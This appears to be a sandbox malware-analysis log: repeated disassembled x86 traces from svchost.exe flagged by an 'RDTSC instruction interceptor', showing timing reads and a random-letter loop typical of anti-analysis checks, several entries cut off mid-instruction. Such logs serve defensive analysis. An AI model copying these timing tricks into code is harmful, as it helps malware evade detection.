Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA596B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA590F3h 0x00000033 call 2AA4FF96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA591D0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4F8F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59375h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA598F0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59250h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59213h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59155h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F876h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59193h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59275h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exeRDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x